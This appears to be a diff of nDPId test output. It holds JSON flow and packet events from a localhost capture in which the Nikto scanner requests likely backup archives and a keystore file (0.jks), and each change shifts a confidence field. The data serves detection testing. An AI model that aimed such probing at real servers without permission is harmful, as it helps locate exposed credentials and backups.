-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 